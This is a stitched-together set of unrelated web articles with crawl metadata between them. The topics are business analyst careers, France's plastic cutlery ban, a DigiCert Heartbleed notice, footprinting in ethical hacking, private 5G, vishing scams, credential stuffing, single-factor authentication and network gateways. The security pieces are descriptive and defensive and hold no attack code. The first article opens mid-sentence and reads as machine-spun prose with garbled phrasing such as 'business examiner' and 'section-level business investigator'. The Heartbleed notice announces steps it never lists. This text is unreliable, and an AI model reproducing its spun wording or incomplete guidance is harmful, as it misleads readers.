analysis Business analysts need to be adept in modeling and gathering requirements Data analysts require secure business intelligence and data mining skills, alongside dexterity with popular technologies like AI and machine learning. For business analysts, a proper business administration background becomes a useful advantage, with many business analysts emerging from computer science, business, IT, management, or related field backgrounds In the case of data analysts, a background in information technology or math is preferred since an understanding of complex statistics, databases, and algorithms are required. How to Become a Business Analyst? A business analyst is accountable for understanding a business's evolving needs and giving mechanical answers to improve its cycles and systems. Therefore, a business analyst is frequently considered as the connection between the business and IT divisions. Below you will find some of the necessary steps to become a business analyst : Get an undergraduate degree in business administration, finance, or accounting Beyond your four-year certification in business, you will need to get familiar with some computer programming. Several business analyst jobs require various degrees of technical proficiency. However, the more computer abilities you have, the better you will look as a candidate. Gain work experience You can pick up involvement with a volunteer function with a little organization first, or make the most of summer entry-level position openings. If you are already working with an organization in an alternate job, offer to chip away at the sort of ventures that business analysts embrace. There are numerous adaptable abilities to filling in as a business analyst, and the function of a business examiner is wide-running. People can enter the field either with information on a particular business space, for example, work process, charging, or client relations, or with information in an industry. For example, money, media communications, or government. Whenever you are recruited as a section-level business investigator, make a point to pick up experience across various kinds of undertakings; later, you can spend significant time in the area or industry you are especially intrigued by. Earn a Master’s degree or obtain an advanced certificate Numerous colleges offer master's degrees and graduate certificates in business analyst, which normally contains courses for business data analytics, tasks research, data set analytics, and predictive analytics. For those with advanced knowledge of business analysts, the International Institute of Business Analysis offers a professional certificate called the Certified Business Analysis Professional. (Related article: 7 Steps of Business Analytics Process) "Business analysts must have a thick skin: thick enough to take feedback on documents and receive unexpected answers to questions!" - Laura Brandenburg We can say that business analysts are an important part of any organization. In simple words, the business analyst's fundamental goal is enabling companies to cost-effectively execute technology solutions by specifying the conditions of a program and conveying them certainly to stakeholders, partners, and facilitators. There are several different factors to the job, business analysts commonly pursue a structure of analysis group, proposing remedies, and then carrying out these treatments in the shape of modern or modified technology in business. (Also read: 5 Ways in which Big Data Analytics is helping businesses). A business analyst will be expected to conduct polls, and workshops, communicate with partners to know the necessities of the company, work with stakeholders to know the service or product provided, analyze and model data to produce decisions. Therefore, business analysts must continue to enhance their positions and stay abreast of technological improvements to stay relevant.
<urn:uuid:5ae3739e-bd23-44e2-af11-620c5d8b6ad4>
CC-MAIN-2024-38
https://www.analyticssteps.com/blogs/what-business-analyst-roles-skills-and-responsibilities
2024-09-12T20:05:07Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651491.39/warc/CC-MAIN-20240912174615-20240912204615-00376.warc.gz
en
0.940283
2,143
2.84375
3
Implications of France’s Ban on Disposable Plastic Cutlery In an effort to reduce environmental damage and carbon footprint, France is the first country to ban disposable plastic cutlery. The directive suggests that plastic utensils be replaced with eco-friendly products made with 50% biodegradable, compostable, and biologically sourced material, by January 2020. In context, this regulation supports France’s “Energy Transition for Green Growth Act,” that is considered to be an overarching law adopted in 2015 targeted at minimizing climate change issues. The regulation puts pressure on the manufacturers of such cutlery to invest in the development of novel products with bio-based biodegradable content and introduce them by 2020. Moreover, the booming take-out, delivery, and food service & catering industry is deeply concerned about the detrimental impact this regulation will have on its revenues. Pack2GO Europe, with its headquarters in Brussels, is the first organization to react and oppose this ban, saying that the ban violates the European Union laws on the free movement of goods. Pack2GO Europe is the industry association that represents Europe’s top food-packaging manufacturers. The French regulation refers to disposable plastic products that have become notorious for their ability to increase litter, pollute the environment, and even pose risks to land and marine life. While these products are at the heart of the flourishing catering, take-out and delivery food service business, they are also in most cases thrown away rather than recycled, and thus likely to end up in landfills. The Pros and Cons of Disposable Plastic Cutlery Reasons for the Popularity of Disposable Plastic Cutlery The reasons for the rise in plastic cutlery usage (and thus, an environmental concern) are as below: 1. Disposable cutlery are usually manufactured from polystyrene or styrofoam that is difficult to recycle and thus less likely to be part of a municipal recycling program. Even if the item is made of recyclable plastics, the convenience factor cannot be dislodged by revisiting the traditional concept of reusable metal or ceramic cutlery. 2. The overarching concept of disposable plastic cutlery is driven by fast modern lifestyles demanding convenience, and suggesting that they be replaced by reusable silverware, steel, or ceramic utensils for take-outs and delivery is not practical for the consumers who have adapted to plastic cutlery. The very idea of convenience (saving time, food on the go, not having to clean or wash after use, and just toss them into the trash along with leftover food, debris, and grease) is too powerful for consumers, and take-out and delivery food service providers, to ignore. 3. Too many consumers and food service businesses are already well oriented to easier, less stress-free lifestyles, family picnics and vacations, community get-togethers, and events that need quick and convenient food and beverage service to its members. Disposable cutlery make all this possible, as the end users are likely to be people that have very tight schedules and not being able to attend to dish-washing or even recycling efforts. 4. Many end users of disposable cutlery are those who do limited cooking, eating, and serving at home, and some of them (due to lifestyles or work environments) do not even have time or the inclination to sit through dining in a restaurant. Rather than being a challenge, this is seen as an opportunity for all types of restaurant owners (including fine-dining) as additional revenue through take-outs and deliveries. Many eateries and restaurants have limited seating arrangements compared to the demand, and take-outs and deliveries are considered to be win-win options. It also helps restaurants to reduce food wastage by allowing left-over food to be taken home in disposable cutlery. 5. Used disposable utensils are usually loaded with food debris and grease. They range from small items (for example, forks, knives, and spoons) to large complex items (for example, sectioned platters, lids, and trays of diverse plastic types) being too inconvenient to clean or sort. Thus, they are disposed all together in garbage bags and likely to go into a landfill than being sorted. 6. The disposable plastics concept is well entrenched in the coffee and cola dispensing machines sector and any change in cup material will impact business costs. Biodegradable and Recycled Plastics – are they Viable or Cost-effective? Biodegradable plastics are suggested as compostable options and according to technical experts, are not yet fully developed in terms of meeting the functional requirements of disposable cutlery, raw material sourcing, or manufactured with acceptable cost and energy efficiency levels. Currently, disposable cutlery with biodegradable plastic content is not cost-effective for the majority of consumers or food service entities. Supporters of eliminating or reducing disposable plastic usage cite as major concern the large carbon footprint or environmental impact that occurs much before the plastics are even used. During plastic manufacturing and transportation, high levels of energy and resources are required that do not justify their one-time use. Though recycled plastic seem to be a better option than virgin plastic, plastics in general contain known carcinogens and can leach toxic chemicals such as BPA into the food and environment when in landfills. Other Plastic Items in Perspective Disposable Plastic Water Bottles Plastic utensils or cutlery are one of the four major disposable products that supporters of environmentally friendly initiatives usually list as offensive, apart from plastic grocery bags, plastic water bottles, and Ziploc bags. Plastic water bottles have received the best attention so far in terms of curbside municipal recycling programs, with 23-25% of used bottles being collected and recycled. In addition, plastic grocery bags and Ziploc bags are more notorious and likely to end up as garbage/waste and in landfills. For instance, in the United States only 6% of plastic waste is recycled. Disposable Plastic Grocery Bags The plastic cutlery related ban is likely to be more difficult to enforce than the plastic grocery bags ban that is in effect in several countries including France. Countries that have banned the use and distribution of disposable plastic grocery bags include France (recently in July 2016), India, Bangladesh, China, Brazil, Mexico, Italy, and the United States (20 states, 132 cities). Countries in Africa namely South Africa, Uganda, Somalia, Rwanda, Botswana, Kenya, and Ethopia also have banned plastic grocery bags. Countries that have imposed a tax on disposable plastic grocery bags are Germany, Ireland, Wales, Scotland, England, Australia, and Belgium. The idea of using reusable bags of thicker plastic or composite material, fabrics, or cloth is considered to be acceptable by many consumers. Consumers are also encouraged by some major grocery chains to bring in their own bags or are discouraged to use plastic grocery bags through a small fee per bag (which was previously provided as complimentary). Plastic packaging is somewhat different from disposable bags and cutlery, in that the packaging has a longer functional lifespan from the manufacturing facility through transportation, storage in the warehouse, on the retail shelf, and finally in the consumer’s home or table. These packages– containers, bottles, jars, boxes, trays, and dispensers– are expected to be thicker and more durable with high quality plastic, and tightly regulated with greater regulatory compliance. Apart from some re-use potential at homes, plastic packaging pass through more opportunities for recycling through city or provincial programs, and are thus less like to end up in garbage bins and landfills. The food & beverage industry depends on plastic packaging for making their products safe, secure, lightweight, microwavable, temperature resistant, or sterilizable. Banning such plastic packaging will compromise the current status of the food & beverage industry, and is not likely to be a viable or required solution. Banning disposable plastic cutlery seems to be inconvenient to a larger number of consumers and food service industry. Unlike the traditional options (durable, reusable cloth, or other bags) for disposable plastic grocery bags, the traditional options (metal or ceramic cutlery) for plastic utensils are not very practical. Municipal recycling programs are not as well organized as for plastic water bottles and other durable plastic packaging. Finding new consumer-friendly ways to collect, sort, and recycle disposable plastic cutlery is probably the future forward, than just banning them. However, only time will tell how the regulatory authorities and the plastic cutlery industry works together in different countries following France’s recent ban.
<urn:uuid:b61ed056-3f30-46e2-8115-5d3f8c90d6d0>
CC-MAIN-2024-38
https://dev.frost.com/growth-opportunity-news/disposable-plastics-and-recycling-trends/
2024-09-16T14:11:19Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651697.32/warc/CC-MAIN-20240916112213-20240916142213-00076.warc.gz
en
0.950743
1,787
2.984375
3
On April 7, 2014, a bug in the OpenSSL software library was announced by the OpenSSL organization. This bug, called Heartbleed, impacts versions 1.0.1 through 1.0.1f of OpenSSL. Heartbleed is not an SSL bug or flaw with the SSL/TLS protocol — it's a bug in OpenSSL’s implementation of SSL/TLS which servers rely on to create secured connections online.Heartbleed affects nearly two-thirds of servers on the Internet. Chances are you administer a server affected by the Heartbleed bug or have received an email notification to update passwords because of the effect of Heartbleed. According to the Heartbleed website hosted by Codenomicon, whose engineers were among those who discovered Heartbleed: The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. SSL/TLS provides communication security and privacy over the Internet for applications such as web, email, instant messaging (IM) and some virtual private networks (VPNs).The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software. This compromises the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users and the actual content. This allows attackers to eavesdrop on communications, steal data directly from the services and users and to impersonate services and users. A few things that set Heartbleed apart from other bugs are: The versions of OpenSSL that are vulnerable to Heartbleed are 1.0.1 through 1.0.1f, and 1.0.2-beta1. The 1.0.0 branch and earlier were not vulnerable, and the 1.0.1g version released yesterday fixes the vulnerability. (Version 1.0.2-beta2 will include the fix.) If your servers do not use version 1.0.1 through 1.0.1f or 1.0.2-beta1 of OpenSSL, or if they are compiled without the heartbeat extension, they are not vulnerable to Heartbleed. Microsoft-based platforms, not utilizing OpenSSL are unaffected by Heartbleed. Java along with many other servers and network devices not use OpenSSL. Although some devices can still rely on OpenSSL, so it's best to contact your device manufacturer or the DigiCert 24/7 Technical Support team to verify if you're vulnerable to Heartbleed. If you are using keystores and truststores, you most likely are using JSSE rather than OpenSSL and are not vulnerable to Heartbleed. If you're unsure whether a site you administer or use is vulnerable, you can use the DigiCert Certificate Checker tool for free on by going to digicert.com/help. The DigiCert Certificate Checker allows users to check the security for any site on the Internet using an SSL Certificates from any Certificate Provider. Although there are no documented cases of Heartbleed being exploited to date, because the attack is undetectable, it is impossible to say that no attempt has been made. Compromised data has yet to be linked to Heartbleed, but if your server is running a version of OpenSSL between 1.0.1 and 1.0.1f with the heartbeat extension enabled, you are potentially vulnerable to Heartbleed and should take the steps below to address it. If you have any question as to whether you are vulnerable, the latest version of DigiCert’s free Certificate Inspector has added Heartbleed to the lengthy list of vulnerabilities it can detect. To learn more and get access to this tool, visit https://www.digicert.com/heartbleed-bug-vulnerability.htm. If you are vulnerable to Heartbleed, there are two steps you need to take: The order of these steps is very important — it's critical that you stop the bleeding before addressing the possible damage — but both steps need to be done as quickly as possible. There are two three (see update below) options for updating your server. You can either update to OpenSSL version 1.0.1g, or you can recompile your existing version of OpenSSL with -DOPENSSL_NO_HEARTBEATS . Neither option is inherently better than the other; different dependencies and situations call for different solutions. But you should take one of these actions immediately. The first step, whether you are a DigiCert customer or not, is to create a new key pair and Certificate Signing Request. DigiCert has a very useful free tool to quickly create CSR creation commands. The last thing you want to do when quickly trying to address Heartbleed is fumble with complicated shell commands. The DigiCert Easy CSR for Apache and Exchange CSR Command Generator make it easy to re-key or create a new a new SSL Certificate. These tools are available to anyone, whether using DigiCert or another SSL Certificate provider. If you are a DigiCert customer, re-keying is always free, easy, and nearly instantaneous. Here are the steps: You will need to re-key every certificate that has been on a vulnerable server. Now that Heartbleed has been made public, if you use one of the affected versions of OpenSSL, it is important that you address the issue. The DigiCert team is always available 24/7 to provide any assistance you may need in re-keying your DigiCert certificates or answer any questions about Heartbleed. As a DigiCert policy, any SSL user, whether a DigiCert customer or not, can call, email, or live chat with us by visiting our Contact page at http://www.digicert.com/contact-digicert-inc.htm.
<urn:uuid:42939168-e7bd-4842-aa29-2fe0e2bd9497>
CC-MAIN-2024-38
https://www.digicert.com/blog/heartbleed-openssl-fix
2024-09-16T13:38:06Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651697.32/warc/CC-MAIN-20240916112213-20240916142213-00076.warc.gz
en
0.912749
1,245
2.953125
3
Basic principles of Ethical Hacking- Gathering information on the target system is the first stage in ethical hacking. Footprinting refers to the methods and strategies used to collect this data. Footprinting entails acquiring information on the network, the host, and the individuals that work there. It’s a crucial step that any ethical hacker must complete in order to be successful. Footprinting aids in determining an organization’s security posture. It enables an ethical hacker to obtain IP addresses, DNS information, OS systems, phone numbers, email addresses, and other useful data. Footprinting can give you a good idea of how a company regards its security. Attack surface reduction The ethical hacker can use footprinting to understand the attack surface. One of the first things an ethical hacker will do is look at what ports are open and what the target system’s characteristics are. What is the most straightforward method for reducing the attack surface? Make careful to close any ports that aren’t in use. Although this is a relatively fundamental notion, hackers enjoy it when it is missed. And it is frequently the case! Footprinting will aid in the creation of network maps for the target company. These network maps show the topology, routers, servers, and other important network components. Footprinting assists in identifying the specifics of network components and may even allow the ethical hacker to locate the components physically!
<urn:uuid:b13b6ec7-7854-47e8-91c4-ed9b539aef6c>
CC-MAIN-2024-38
https://cybersguards.com/basic-principles-of-ethical-hacking/
2024-09-20T03:42:58Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652130.6/warc/CC-MAIN-20240920022257-20240920052257-00676.warc.gz
en
0.885969
290
3.578125
4
We have heard about 5G for a few years now. Newer smartphones are all 5G-enabled. Service providers want you to get that new phone and experience 5G. If you have a 5G phone, you may have even noticed that downloads are faster (much faster if you happen to be in certain areas). However, 5G is probably not changing your life (yet). Better than 4G? Yes, but perhaps not a transformative experience. While most consumers think that 5G is all about them, the truth is 5G is ideal for addressing the networking needs of business and enterprise. Many of the new features of 5G may not even be noticed by consumers but will be game-changing for some companies. Some of these new capabilities will be offered by communications service providers (CSPs) to enterprises utilizing public 5G networks, but there is now an even more transformative option: private 5G networks. Companies have long employed private wired and wireless networks (primarily Wi-Fi), as well as other network types, for their data needs, but why would an organization employ a private 5G network for data? A private 5G network is isolated and restricts the devices that connect to the network. Wireless networks (of any type) add a level of flexibility not available with wired networks. Moving a connected device with a wired network may involve moving the network as well. This process is often expensive and, in certain situations, not possible. Wi-Fi works great in many situations, but it cannot scale to the same levels that cellular achieves. Cellular network technology provides several advantages, including being designed for mobility (moving devices) and connection reliability, supporting greater coverage due to increased power levels, and allowing for much higher device density. Private 5G networks are not likely to replace Wi-Fi and wired networks entirely; instead, they will cover use cases that the other technologies do not cover or do not cover well. In the telecom industry, technologies are often debated and discussed in great detail. However, the reasons an enterprise decides to install a private 5G network is NOT about technology but about addressing business requirements that current networking options (Wi-Fi or wired networks) are not handling. Public and private 5G networks enable use cases that other wireless technologies do not, and those use cases pay dividends that can be measured financially and with improvements in efficiency and safety. Small improvements in efficiency can add up to millions of dollars in savings. Keeping employees safe is more important than just the financial impact. These dividend-paying use cases may sometimes be solved with public 5G. However, there are other situations in which private 5G networks become the best solution. For instance: - Coverage issues may limit the public option. This is often the case in certain industries where public cellular coverage at a location is limited or nonexistent, e.g., underground mines or offshore oil rigs. - While a facility may have adequate coverage outside, inside may be more challenging. Factories or warehouses are good examples, with both the building shell and contents as potential sources of interference. - Control of data can be a deciding factor. Some businesses require that their data never leave their control (for competitive or security reasons). Most of the current activity in private 5G networks is with large enterprises in certain industries, such as mining, energy, manufacturing, and more. As 5G evolves over the next decade or so, private 5G networks will evolve to support smaller companies in almost all industries. The consumer market has long been the bread-and-butter for CSPs. The telecommunications industry is capital-intensive and requires heavy investment to compete. CSPs have invested significantly in 5G. The stark truth is those CSPs depending just on the consumer market for a return on investment will fail. 5G is designed with the enterprise market in mind and provides new capabilities that no other networking technology can provide. To achieve an acceptable return on their 5G investments, CSPs must better serve customers outside of the consumer market. This may be with the public 5G networks. Or it may be by providing enterprises with private 5G networks. (Or perhaps some combination.) Not all private 5G networks will involve CSPs, but perhaps the most lucrative will. CSPs must take advantage of this opportunity, and the most successful CSPs globally are actively involved in growing this market. All private 5G networks will involve network infrastructure suppliers. As more of the world roll out 5G, there will come a time with slower growth for network infrastructure suppliers and public 5G networks. With private 5G networks growing strongly, suppliers may not even notice the slowdown. Private 5G networks have the potential to transform enterprise data communication needs AND enable CSPs to continue providing consumers and industry ever-evolving communications services. Want to learn more about how private 5G networks can benefit your enterprise? Click here Troy M. Morley Frost & Sullivan Some private cellular networks are starting out as 4G networks, but most will eventually upgrade to private 5G networks.
<urn:uuid:33c06fa3-fb00-491a-9435-343da3c61442>
CC-MAIN-2024-38
https://www.frost.com/growth-opportunity-news/why_private_5g-networks_will_be_game-changing_for_businesses/
2024-09-20T04:01:10Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652130.6/warc/CC-MAIN-20240920022257-20240920052257-00676.warc.gz
en
0.955039
1,036
2.546875
3
Nearly 1 in 3 Americans have fallen victims to a phone scam. According to a report from Truecaller, 59.4 million Americans have lost a total of $29.8 billion to phone scams in the last year. Cybercriminals are getting sophisticated, they equip themselves with the latest technologies and leverage social engineering tactics to swindle their unsuspecting victims into becoming a vishing victim. Short for voice phishing, a person disguises themselves on the telephone to steal sensitive information from victims. Cybercriminals use clever social engineering tactics to persuade the victims to give up their private information. In most vishing scams, callers will pretend to be calling from the victim’s bank, tax department, government office, and so on. The victim will be led to believe that they are doing the right thing since the language used by the cybercriminal is convincing and laced with threats that make the former feel as if they have no option but to give up the information. Cybercriminals attack both individuals and organizations. They use the CEO’s identity and will call an employee to persuade them to transfer funds to a particular account, while making them believe that the transfer was made at the behest of the CEO. Cisco’s 2021 Cybersecurity Threat Trends report says that phishing accounts for more than 90% of data breaches. Vishing, smishing, and pharming are considered the most prevalent threats. Vishing scams are becoming mainstream, and they are incredibly easy to orchestrate. This is what makes vishing attacks a terrifying affair. The main objective of a vishing attack is to gain access to sensitive financial information or the personal data of an individual. Vishing attacks are easier to commit than in-person attacks. Why? Because in a face-to-face attack, the chances of verifying the authenticity of the other person increase. You can ask the person to show their ID cards, verification badges, or any access cards. That’s exactly why vishing attacks are easier to perform, as the scammer can use a lot of methods to con the victim. You can identify a vishing scam based on the context of the call. The communication can be assumed to be like this: Most of us know someone who has been duped in this way. On average, Americans receive almost 31 spam calls per user per month. These are worrying numbers as the livelihoods of people are at stake here. Let us look at some of the most common vishing techniques so that one can identify a vishing attack if they receive one. VoIP technology makes the creation of fake numbers easy. Cybercriminals can create fake numbers that are difficult to track. They are made to appear local, or even come with a 1-800 prefix. Sophisticated cybercriminals will also create their VoIP numbers in such a way that they look as if they are coming from a legitimate government account or their bank. Just like VoIP-enabled vishing, cybercriminals use fake phone numbers by spoofing the caller ID. They pretend to be a caller from the government, the IRS, the police department, or a fraud-investigating agency. Since the modus operandi of these criminals usually entails making them look as if they are a figure of authority so that the victims can share their private information, spoofing caller ID to make the number look legitimate is pivotal. In this, hundreds or thousands of automated calls are made to hundreds or thousands of numbers. Their intended victim may get a recording threatening them to call back the scammers. The vishers will say that they are calling on behalf of the tax department or the victim’s bank. Wardialing usually focuses on a specific area code. The attackers collect the phone numbers by digging into the dumpsters behind banks and other organizations. Using information gathered from this exercise, they deliver a targeted vishing attack against the victim. Cyvatar detects and fixes vulnerabilities before attacks reach networks. See what Cyvatar’s Cyber Prevention & Cloud plan can do for your business. | These are some of the ways in which vishing attacks take place. Being aware of this helps people from falling prey to such scams. The victim will receive a pre-recorded message. They will be told that there is something wrong with your tax return, and if they don’t call back immediately, an arrest warrant will be issued. The victims get an offer to invest in an ‘exciting’ project or obtain a loan at a lower interest rate. Since these kinds of transactions require financial information, the vishers convince the victim to give up personal financial information. If the visher convinces the victim that it is a genuine offer, then the latter wouldn’t hesitate to share information. Unfortunately, most vishing victims are the elderly. Their operation involves using the victim’s condition to con them into giving up their personal data. In return for their cooperation, they get a promise for a discount or a refund. Since the vishers are hoping to gain access to the bank accounts of their victims, the smartest way to con them would be to pose as an official from the bank. By using the bank’s routing number (easily found online) and the victim’s account number, the attacker can transfer funds to their account. All they need is the credit card number, expiry date, and security code to make purchases online or over the phone. It is not easy to recognize a vishing scam as the victims are not made to feel as if they are being conned. But if you are aware about how to spot a vishing scam, you might be able to save yourself. No federal agency will contact you directly unless you’ve requested contact and will never ask you for your financial information. In fact, anyone who calls you asking for your personal or financial information is a scammer. The caller will pretend that they are doing an audit or that they have to verify your information for ‘official’ purposes. They will ask you to confirm your date of birth, name, address, bank account information, social security number, and other personal-identifying information(PII). To make themselves look legit, they will already possess some of this information and share it with you. Their objective is to get the rest of the information. Vishers use threats of an impending arrest if you do not comply with their demands. They will say that you have not paid your taxes or use fear to persuade you to do something. If you ever get a call like this, keep yourself calm and hang up to investigate if the call was from a genuine source. It is most likely that it was a scam. Let us look at commonly used vishing messages: While it is important that everyone knows how to spot a vishing attack, it is even more pertinent that one takes the steps to prevent it from happening. It is free to add your personal or home number to this registry. By doing so, you will stop getting unsolicited calls from telemarketers. When you receive an automated message that asks you to press buttons on your phone, do not do it. Cybercriminals will use this technique to identify people who are susceptible to such targeting. They may even record your voice and use it to navigate voice-automated phone menus. Do not hesitate to ask the caller to identify themselves. Alternatively, you can also use the internet to search for the caller, the company they represent and ask them for any other information that can be used to verify their identity. If you receive a call from an unknown person, do not offer them any personal or confidential information. Even information as simple as the name of your high school could be a security question that your bank asks to verify your identity. Scammers will try to sound nice to get access to your information, do not give in. If you think that the caller might not be from a trustworthy source, then hang up immediately. You can also check for the correct number of the organization they claimed to be from and cross-verify it. Listen to the caller carefully and analyze whether they are using social engineering techniques such as using urgency, punishment, or fear to make you give up critical information. Another simple but highly effective step to not becoming a phishing victim is to avoid responding to any unsolicited emails, outreach messages, or marketing communications. If the caller says that they are giving you a free prize, ask them for proof by asking for information to verify the same. Make sure you ratify the identity of the caller before you proceed to give even the tiniest of information. Falling prey to a vishing scam can be devastating mentally and will even result in loss of resources, usually money. Educate yourself, your loved ones, and colleagues as to how they can stay safe from vishing scams. If you have shared your personal or financial information recently, and you suspect that it might be a vishing call, then inform your financial institution or the government agencies. There are multiple agencies, such as the Federal Trade Commission (FTC), Better Business Bureau (BBB), and the Internet Crime Complaint Center (IC3) that are working against vishing scammers. If the vishing attacks have happened in an organization, then create a procedure where employees are asked to report the calls. The report should include the following information: Create a plan where your call center staff educate the customers about the plan of action they could follow when they receive such calls. Let the customers know that the bank will never call, text, or email, asking them to provide their debit or credit card information. If they receive such calls, they should immediately hang up. Remind them that one can easily spoof caller IDs. Ask the customers to identify the area codes that they were requested to call. Inform the local FBI authorities or report it online so that they will handle it. FBI authorities can get the phone line shut down immediately, thereby preventing someone else from being defrauded. You can also report the vishing calls to the Federal Trade Commission online. Why bother recovering when you can prevent vishing attacks in the first place? Cyvatar was built on the concept of preventing attacks before they even hurt you. The best way to prevent vishing attacks from succeeding is to avoid sharing sensitive information over the phone. However, with Cyvatar’s end-to-end prevention, you can stop the vishing attacks even before they happen. Cyvatar protects your endpoints, preventing any data exfiltration, ensuring the phone numbers of clients and employees remain safe within each endpoint of your network. This helps prevent the attackers from getting the phone numbers needed to launch the vishing attack. Should things go south, Cyvatar and Cysurance’s cybersecurity guarantee has your back and covers up to $100,000 in breach-related costs. Circa Las Vegas Thurs. Aug 5th Cybersecurity Reunion Pool Party at BlackHat 2021
<urn:uuid:94a98bd2-0adc-40e3-ac7d-c97e652cad3a>
CC-MAIN-2024-38
https://cyvatar.ai/what-is-vishing/
2024-09-08T00:22:36Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650926.21/warc/CC-MAIN-20240907225010-20240908015010-00876.warc.gz
en
0.951592
2,295
2.640625
3
Credential stuffing is a new form of cyber attack in which the criminal uses collected usernames and passwords from previous breaches to gain fraudulent access to user accounts. The cybercriminals collect billions of login credentials over the years as a result of data breaches. They use these credentials for spam, phishing, and account takeovers. Credential stuffing is becoming a common way of stealing usernames and passwords. In the kind of attack, the cybercriminal uses a list of known valid credentials obtained from the previous breaches to get the usernames and passwords instead of guessing the password. These kinds of attacks have more chances of success and more comfortable to perform. People use the same password across different websites; the cybercriminal steals data from low-profile websites and uses it to gain access to substantial-profile websites to get sensitive data. The cybercriminal sells the stolen credential and specialized tool, which leads to successful automated credential stuffing attacks. The cybercriminals make combo lists that are gathered from different data. The credential stuffing does not require much effort, special skill, and knowledge to be launched. How to detect and mitigate credential stuffing attacks The cybercriminal launches these attacks through Botnet and automated tools, which supports the use of proxies. The attackers shape their tools to mimic legitimate user agents and pretend to be from a trusted person and site. It becomes difficult for users to differentiate between the attack and legitimate login attempts. The risk of credential attacks on high-traffic websites is more as sudden login requests do not seem to be strange. If the login failure rate increases over a short period, it means that a credential stuffing is in progress. Firms should add multi-factor authentication (MFA) to their security process. Many attacks require more effort and to pull off en-masse than credential stuffing. They should make MFA mandatory for all user accounts and enable it for users who are determined to be at higher risk. Large companies monitor public data dumps and check the impacted email addresses if it exists in their systems; they should force password resets and strongly suggest enabling MFA. Firms should train their employees about password hygiene and cyber attacks. Reusing the password leads to credential stuffing, so it’s vital to discourage them from using it again. The use of password managers for generating unique and complex passwords should be encouraged within firms.
<urn:uuid:831d9908-904d-4a26-b25a-75061c3525b6>
CC-MAIN-2024-38
https://www.infoguardsecurity.com/how-to-prevent-detect-and-defend-against-credential-stuffing/
2024-09-08T00:40:39Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650926.21/warc/CC-MAIN-20240907225010-20240908015010-00876.warc.gz
en
0.940098
481
3.453125
3
Secure Alternatives to Single-Factor Authentication and Password Managers Single-factor authentication is a method of signing in that matches one factor, usually a password, to a username to gain access to a website or network. Password and username combinations have been used for decades, and they remain the most common verification tool today. Despite its commonality, you should not use single-factor authentication to secure critical data. Learn more about this verification method and how to better protect your business. Is Single-Factor Authentication Safe? Single-factor authentication is not a safe verification option due to the single password credential needed to prove identity. Single passwords are often: - Weak: Hackers can easily guess or crack passwords that use words found in the dictionary, personal information, or simple patterns. Hackers may discover your personal information or use bots to generate the right combination of numbers and letters. - Common: Single-factor authentication can be dangerous when you use the same password for multiple websites. If a hacker can crack it on one account, they can also gain access to many different accounts. - Vulnerable: Hackers use several tactics to steal passwords, including keylogging, phishing, and social engineering. With single-factor authentication, your account is instantly compromised once your password has been stolen. When hackers figure out a single password, they can access even more sensitive information. Single-factor authentication is especially dangerous for businesses supporting critical infrastructure, such as national security, economic stability, and public health. Alternatives to Single-Factor Authentication Passwords are still valuable security tools, especially when created to be strong and unique. To ensure thorough cybersecurity for your company, you should use passwords with various other credentials to form a sign-in method called multifactor authentication. Multifactor authentication uses several factors, such as: - Something you know: Examples of these factors include strong passwords or phrases. - Something you have: A personal mobile device, like a smartphone, or a secure Bluetooth token are ideal options for this factor. - Something you are: Biometrics such as face or voice recognition, retinal scans, movement patterns, or hand scans can be powerful factors. Combining these factors is one of the best ways to ensure secure and accurate verification. Two-factor authentication is a common sign-in method for many websites and networks that requires users to have a password and a personal device that can confirm identity through SMS or a specific app. Improve Your Cybersecurity With Agio Looking for more guidance on improving your company’s cybersecurity? Agio has you covered. Learn more about our cybersecurity capabilities to see how we can help protect your data. Connect with us. Need a solution? Want to partner with us? Please complete the fields below to connect with a member of our team.
<urn:uuid:f1f735c3-2dca-497a-be68-2b1f654cfb7d>
CC-MAIN-2024-38
https://agio.com/secure-alternatives-to-single-factor-authentication-and-password-managers/
2024-09-09T04:26:16Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651072.23/warc/CC-MAIN-20240909040201-20240909070201-00776.warc.gz
en
0.912657
576
2.96875
3
Definition: Network Gateway A network gateway is a device or software that serves as a bridge between two networks, allowing data to flow between them. It acts as an entry and exit point, managing the data traffic and ensuring that it is properly routed to its destination. Gateways are essential components in networking, as they enable communication between different networks, including those with different protocols or architectures. Understanding Network Gateway A network gateway is a crucial element in any networking setup, whether it’s a small home network or a large enterprise network. It facilitates the seamless transfer of data between networks, which might otherwise be incompatible. This compatibility is achieved by converting data formats, protocols, and addressing schemes to ensure that information is correctly interpreted and delivered across different network environments. Key Functions of a Network Gateway Network gateways perform several vital functions: - Protocol Translation: Gateways can translate different communication protocols to ensure that data can move freely between different network types. For instance, a gateway can convert a packet from an IPv4 network to be compatible with an IPv6 network. - Data Routing: They determine the best path for data packets to travel from the source to the destination. This routing capability is essential for efficient and reliable network communication. - Security: Gateways often incorporate security features such as firewalls, VPNs, and intrusion detection systems to protect the network from unauthorized access and cyber threats. - Network Address Translation (NAT): This function allows multiple devices on a local network to be mapped to a single public IP address, conserving the number of IP addresses needed and adding a layer of security by hiding internal IP addresses from external view. - Bandwidth Management: By controlling the flow of traffic, gateways can prioritize certain types of data and manage bandwidth usage to prevent congestion and ensure optimal network performance. Types of Network Gateways There are various types of network gateways, each serving specific purposes within a network: - Internet Gateway: Connects a local network to the internet, managing the data traffic between the internal network and the global web. - Enterprise Gateway: Used in corporate environments to connect different segments of a company’s internal network, often incorporating advanced security and management features. - Cloud Gateway: Facilitates connectivity between an on-premises network and cloud services, enabling the integration of cloud-based resources with local infrastructure. - VoIP Gateway: Converts voice data from traditional telephony systems to IP-based networks, allowing for Voice over Internet Protocol (VoIP) communications. - IoT Gateway: Connects Internet of Things (IoT) devices to the cloud or other networks, managing the data traffic and protocols used by various IoT devices. Benefits of Using a Network Gateway Implementing a network gateway in a network infrastructure offers several benefits: - Interoperability: By translating protocols and data formats, gateways enable different network systems to communicate effectively, enhancing overall 